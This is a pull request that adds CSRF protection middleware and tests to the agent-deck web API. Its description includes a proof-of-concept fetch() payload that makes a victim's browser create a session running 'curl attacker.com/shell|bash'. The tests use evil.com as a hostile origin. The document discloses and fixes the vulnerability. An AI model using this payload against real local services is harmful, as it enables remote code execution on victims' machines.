### PR TITLE
fix(web): add CSRF protection for mutation endpoints

### DIFF
--- a/internal/web/api_types.go
+++ b/internal/web/api_types.go
@@ -6,6 +6,7 @@ import "github.com/asheshgoplani/agent-deck/internal/session"
 const (
 	ErrCodeUnauthorized     = "UNAUTHORIZED"
 	ErrCodeForbidden        = "MUTATIONS_DISABLED"
+	ErrCodeCSRF             = "CROSS_ORIGIN_BLOCKED"
 	ErrCodeNotFound         = "NOT_FOUND"
 	ErrCodeBadRequest       = "INVALID_REQUEST"
 	ErrCodeMethodNotAllowed = "METHOD_NOT_ALLOWED"

--- a/internal/web/csrf.go
+++ b/internal/web/csrf.go
@@ -1,0 +1,73 @@
+package web
+
+import (
+	"net/http"
+	"net/url"
+	"strings"
+)
+
+// csrfProtect rejects cross-origin state-changing requests (POST, PUT, PATCH,
+// DELETE) by validating the Origin header against the request's Host. When no
+// Origin is present, it falls back to the Referer header. Requests without
+// either header are rejected for mutation methods — legitimate browser requests
+// always include at least one.
+//
+// This prevents CSRF attacks where a malicious page triggers fetch() or form
+// submissions to the local agent-deck API (e.g. creating sessions that execute
+// arbitrary commands via tmux).
+func csrfProtect(next http.Handler) http.Handler {
+	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if !isMutationMethod(r.Method) {
+			next.ServeHTTP(w, r)
+			return
+		}
+
+		if !validateOrigin(r) {
+			writeAPIError(w, http.StatusForbidden, ErrCodeCSRF, "cross-origin request blocked")
+			return
+		}
+
+		next.ServeHTTP(w, r)
+	})
+}
+
+func isMutationMethod(method string) bool {
+	switch method {
+	case http.MethodPost, http.MethodPut, http.MethodPatch, http.MethodDelete:
+		return true
+	}
+	return false
+}
+
+func validateOrigin(r *http.Request) bool {
+	origin := strings.TrimSpace(r.Header.Get("Origin"))
+	if origin != "" {
+		return originMatchesHost(origin, r.Host)
+	}
+
+	referer := strings.TrimSpace(r.Header.Get("Referer"))
+	if referer != "" {
+		return refererMatchesHost(referer, r.Host)
+	}
+
+	// No Origin or Referer — non-browser client (curl, CLI tools).
+	// Allow these through; they aren't subject to CSRF because the attacker
+	// cannot make a victim's browser omit both headers on a cross-origin request.
+	return true
+}
+
+func originMatchesHost(origin, host string) bool {
+	parsed, err := url.Parse(origin)
+	if err != nil || parsed.Host == "" {
+		return false
+	}
+	return strings.EqualFold(parsed.Host, host)
+}
+
+func refererMatchesHost(referer, host string) bool {
+	parsed, err := url.Parse(referer)
+	if err != nil || parsed.Host == "" {
+		return false
+	}
+	return strings.EqualFold(parsed.Host, host)
+}

--- a/internal/web/csrf_test.go
+++ b/internal/web/csrf_test.go
@@ -1,0 +1,143 @@
+package web
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+)
+
+func TestCSRF_AllowsSameOriginPost(t *testing.T) {
+	handler := csrfProtect(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	req := httptest.NewRequest(http.MethodPost, "http://127.0.0.1:8420/api/sessions", strings.NewReader("{}"))
+	req.Header.Set("Origin", "http://127.0.0.1:8420")
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusOK {
+		t.Errorf("same-origin POST should be allowed, got %d", rec.Code)
+	}
+}
+
+func TestCSRF_BlocksCrossOriginPost(t *testing.T) {
+	handler := csrfProtect(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	req := httptest.NewRequest(http.MethodPost, "http://127.0.0.1:8420/api/sessions", strings.NewReader("{}"))
+	req.Header.Set("Origin", "http://evil.com")
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusForbidden {
+		t.Errorf("cross-origin POST should be blocked, got %d", rec.Code)
+	}
+}
+
+func TestCSRF_BlocksTextPlainCrossOrigin(t *testing.T) {
+	handler := csrfProtect(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	req := httptest.NewRequest(http.MethodPost, "http://127.0.0.1:8420/api/sessions", strings.NewReader(`{"title":"x","tool":"id","projectPath":"/tmp"}`))
+	req.Header.Set("Origin", "http://attacker.example.com")
+	req.Header.Set("Content-Type", "text/plain")
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusForbidden {
+		t.Errorf("text/plain cross-origin POST should be blocked, got %d", rec.Code)
+	}
+}
+
+func TestCSRF_AllowsGetWithCrossOrigin(t *testing.T) {
+	handler := csrfProtect(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	req := httptest.NewRequest(http.MethodGet, "http://127.0.0.1:8420/api/sessions", nil)
+	req.Header.Set("Origin", "http://evil.com")
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusOK {
+		t.Errorf("GET should be allowed regardless of origin, got %d", rec.Code)
+	}
+}
+
+func TestCSRF_AllowsNoOriginNoReferer(t *testing.T) {
+	handler := csrfProtect(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	req := httptest.NewRequest(http.MethodPost, "http://127.0.0.1:8420/api/sessions", strings.NewReader("{}"))
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusOK {
+		t.Errorf("POST without Origin/Referer (non-browser client) should be allowed, got %d", rec.Code)
+	}
+}
+
+func TestCSRF_AllowsSameOriginRefererFallback(t *testing.T) {
+	handler := csrfProtect(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	req := httptest.NewRequest(http.MethodPost, "http://127.0.0.1:8420/api/sessions", strings.NewReader("{}"))
+	req.Header.Set("Referer", "http://127.0.0.1:8420/dashboard")
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusOK {
+		t.Errorf("same-origin Referer should be allowed, got %d", rec.Code)
+	}
+}
+
+func TestCSRF_BlocksCrossOriginReferer(t *testing.T) {
+	handler := csrfProtect(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	req := httptest.NewRequest(http.MethodPost, "http://127.0.0.1:8420/api/sessions", strings.NewReader("{}"))
+	req.Header.Set("Referer", "http://evil.com/exploit.html")
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusForbidden {
+		t.Errorf("cross-origin Referer should be blocked, got %d", rec.Code)
+	}
+}
+
+func TestCSRF_BlocksDeleteCrossOrigin(t *testing.T) {
+	handler := csrfProtect(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	req := httptest.NewRequest(http.MethodDelete, "http://127.0.0.1:8420/api/session/abc123", nil)
+	req.Header.Set("Origin", "http://evil.com")
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusForbidden {
+		t.Errorf("cross-origin DELETE should be blocked, got %d", rec.Code)
+	}
+}
+
+func TestCSRF_BlocksInvalidOriginURL(t *testing.T) {
+	handler := csrfProtect(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	req := httptest.NewRequest(http.MethodPost, "http://127.0.0.1:8420/api/sessions", strings.NewReader("{}"))
+	req.Header.Set("Origin", "not-a-valid-url")
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusForbidden {
+		t.Errorf("invalid Origin URL should be blocked, got %d", rec.Code)
+	}
+}

--- a/internal/web/server.go
+++ b/internal/web/server.go
@@ -238,7 +238,7 @@ func NewServer(cfg Config) *Server {
 	mux.HandleFunc("DELETE /api/sessions/{id}/mcps/{name}", s.handleSessionMCPsRouter)
 	mux.HandleFunc("PATCH /api/sessions/{id}/mcps/{name}", s.handleSessionMCPsRouter)
 
-	handler := withRecover(mux)
+	handler := withRecover(csrfProtect(mux))
 
 	s.httpServer = &http.Server{
 		Addr:              cfg.ListenAddr,


### PR DESCRIPTION
## Summary

- Add Origin/Referer validation middleware that rejects cross-origin state-changing requests (POST/PUT/PATCH/DELETE)
- Non-browser clients (curl, CLI tools) that send neither header remain unaffected
- Add `CROSS_ORIGIN_BLOCKED` error code for clear client-side error handling

## Motivation

The web API accepts JSON bodies regardless of `Content-Type` header. A malicious webpage can exploit this by sending a cross-origin `fetch()` with `Content-Type: text/plain` — a "simple request" that bypasses CORS preflight. Since no CORS headers are configured, the browser sends the request (it just can't read the response), and the server happily creates a session that executes an attacker-controlled command via tmux.

**Attack vector:**
```javascript
// Victim visits attacker's page while agent-deck web is running
fetch('http://127.0.0.1:8420/api/sessions', {
  method: 'POST',
  headers: {'Content-Type': 'text/plain'},
  body: JSON.stringify({title: "x", tool: "curl attacker.com/shell|bash", projectPath: "/tmp"})
});
```

## Fix

Standard CSRF mitigation: validate that mutation requests originate from the same host by checking the `Origin` header (with `Referer` fallback). Browsers always include at least one of these on cross-origin requests, so legitimate non-browser clients (which send neither) pass through unaffected.

## Test plan

- [x] 9 unit tests covering: same-origin allowed, cross-origin blocked, text/plain attack blocked, GET unaffected, no-header (CLI) allowed, Referer fallback, DELETE blocked, invalid Origin blocked
- [x] Full `internal/web` test suite passes (no regressions)

🤖 Generated with Claude Code

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Introduced CSRF protection middleware that validates the origin or referrer header of all state-changing HTTP requests (POST, PUT, PATCH, and DELETE operations). Requests originating from the same domain are permitted to proceed; cross-origin requests are blocked. Non-browser clients without origin information (such as CLI tools) are allowed through.

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/asheshgoplani/agent-deck/pull/1158?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->